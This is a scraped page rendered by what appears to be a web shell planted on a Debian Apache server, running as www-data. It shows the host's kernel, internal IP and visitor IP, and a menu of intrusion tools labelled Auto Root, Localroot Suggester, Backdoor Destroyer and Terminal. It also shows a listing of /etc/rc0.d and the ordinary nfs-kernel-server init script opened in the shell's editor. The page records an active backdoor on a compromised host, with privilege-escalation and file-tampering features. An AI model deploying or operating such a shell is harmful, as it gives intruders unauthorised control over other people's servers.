Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.79
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
rc0.d /
Delete
Unzip
Name
Size
Permission
Date
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
2024-09-28 08:35
K01apache2
7.95
KB
-rwxr-xr-x
2024-09-29 18:51
K01exim4
7
KB
-rwxr-xr-x
2025-03-21 14:34
K01haveged
2.31
KB
-rwxr-xr-x
2021-01-13 23:56
K01hwclock.sh
1.71
KB
-rwxr-xr-x
2024-11-21 20:01
K01memcached
3.4
KB
-rwxr-xr-x
2023-01-12 00:02
K01nfs-common
5.53
KB
-rwxr-xr-x
2024-12-11 14:00
K01nfs-kernel-server
4.67
KB
-rwxr-xr-x
2024-12-11 14:00
K01php7.2-fpm
4.19
KB
-rwxr-xr-x
2025-03-11 13:05
K01php7.4-fpm
4.19
KB
-rwxr-xr-x
2025-05-10 04:38
K01php8.1-fpm
4.19
KB
-rwxr-xr-x
2025-03-13 18:12
K01php8.4-fpm
4.19
KB
-rwxr-xr-x
2025-05-09 07:02
K01rpcbind
2.45
KB
-rwxr-xr-x
2022-07-27 09:20
K01udev
6.71
KB
-rwxr-xr-x
2025-03-06 14:56
K01unattended-upgrades
1.36
KB
-rwxr-xr-x
2022-12-31 20:59
K01uuidd
1.28
KB
-rwxr-xr-x
2024-11-21 20:01
Save
Rename
#!/bin/bash ### BEGIN INIT INFO # Provides: nfs-kernel-server # Required-Start: $remote_fs nfs-common $portmap $time # Required-Stop: $remote_fs nfs-common $portmap $time # Should-Start: $named # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Kernel NFS server support # Description: NFS is a popular protocol for file sharing across # TCP/IP networks. This service provides NFS server # functionality, which is configured via the # /etc/exports file. ### END INIT INFO # What is this? DESC="NFS kernel daemon" PREFIX=/usr # Exit if required binaries are missing. [ -x $PREFIX/sbin/rpc.nfsd ] || exit 0 [ -x $PREFIX/sbin/rpc.mountd ] || exit 0 [ -x $PREFIX/sbin/exportfs ] || exit 0 # Read config DEFAULTFILE=/etc/default/nfs-kernel-server RPCNFSDCOUNT=8 RPCNFSDPRIORITY=0 RPCMOUNTDOPTS= NEED_SVCGSSD=no RPCSVCGSSDOPTS= PROCNFSD_MOUNTPOINT=/proc/fs/nfsd if [ -f $DEFAULTFILE ]; then . $DEFAULTFILE fi . /lib/lsb/init-functions do_modprobe() { if [ -x /sbin/modprobe -a -f /proc/modules ] then modprobe -q "$1" || true fi } do_mount() { if ! grep -E -qs "$1\$" /proc/filesystems then return 1 fi if ! mountpoint -q "$2" then mount -t "$1" "$1" "$2" return fi return 0 } # See how we were called. case "$1" in start) export_files="/etc/exports" for file in /etc/exports.d/*.exports ; do if [ -f "$file" ]; then export_files="$export_files $file" fi done if [ -f /etc/exports ] && grep -q '^[[:space:]]*[^#]*/' $export_files then do_modprobe nfsd # See if our running kernel supports the NFS kernel server if ! grep -E -qs "[[:space:]]nfsd\$" /proc/filesystems; then log_warning_msg "Not starting $DESC: no support in current kernel" exit 0 fi do_mount nfsd $PROCNFSD_MOUNTPOINT || NEED_SVCGSSD=no log_action_begin_msg "Exporting directories for $DESC" $PREFIX/sbin/exportfs -r RET=$? if [ $RET != 0 ]; then log_action_end_msg $RET exit $RET fi log_action_end_msg 0 log_daemon_msg "Starting $DESC" log_progress_msg "nfsd" # See if rpcbind is running $PREFIX/sbin/rpcinfo -p >/dev/null 2>&1 RET=$? if [ $RET != 0 ]; then echo log_warning_msg "Not starting: portmapper is not running" exit 0 fi start-stop-daemon --start --oknodo --quiet \ --nicelevel $RPCNFSDPRIORITY \ --exec $PREFIX/sbin/rpc.nfsd -- $RPCNFSDCOUNT RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi # make sure 127.0.0.1 is a valid source for requests ClearAddr= if [ -f /proc/net/rpc/auth.unix.ip/channel ] then fgrep -qs 127.0.0.1 /proc/net/rpc/auth.unix.ip/content || { echo "nfsd 127.0.0.1 2147483647 localhost" >/proc/net/rpc/auth.unix.ip/channel ClearAddr=yes } fi [ -z "$ClearAddr" ] || echo "nfsd 127.0.0.1 1" >/proc/net/rpc/auth.unix.ip/channel if [ "$NEED_SVCGSSD" = "yes" ]; then do_modprobe rpcsec_gss_krb5 log_progress_msg "svcgssd" start-stop-daemon --start --oknodo --quiet \ --exec $PREFIX/sbin/rpc.svcgssd -- $RPCSVCGSSDOPTS RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi fi log_progress_msg "mountd" start-stop-daemon --start --oknodo --quiet \ --exec $PREFIX/sbin/rpc.mountd -- $RPCMOUNTDOPTS RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi log_end_msg 0 else log_warning_msg "Not starting $DESC: no exports" fi ;; stop) log_daemon_msg "Stopping $DESC" log_progress_msg "mountd" start-stop-daemon --stop --oknodo --quiet \ --name rpc.mountd --user 0 RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi if [ "$NEED_SVCGSSD" = "yes" ]; then log_progress_msg "svcgssd" start-stop-daemon --stop --oknodo --quiet \ --name rpc.svcgssd --user 0 RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi fi log_progress_msg "nfsd" start-stop-daemon --stop --oknodo --quiet \ --name nfsd --user 0 --signal 2 RET=$? if [ $RET != 0 ]; then log_end_msg $RET exit $RET fi log_end_msg 0 log_action_begin_msg "Unexporting directories for $DESC" $PREFIX/sbin/exportfs -au RET=$? if [ $RET != 0 ]; then log_action_end_msg $RET exit $RET fi log_action_end_msg 0 if mountpoint -q $PROCNFSD_MOUNTPOINT then $PREFIX/sbin/exportfs -f fi ;; status) status_of_proc nfsd nfsd exit $? ;; reload | force-reload) log_begin_msg "Re-exporting directories for $DESC..." $PREFIX/sbin/exportfs -r RET=$? log_end_msg $RET exit $RET ;; restart) $0 stop sleep 1 $0 start ;; *) log_success_msg "Usage: nfs-kernel-server {start|stop|status|reload|force-reload|restart}" exit 1 ;; esac exit 0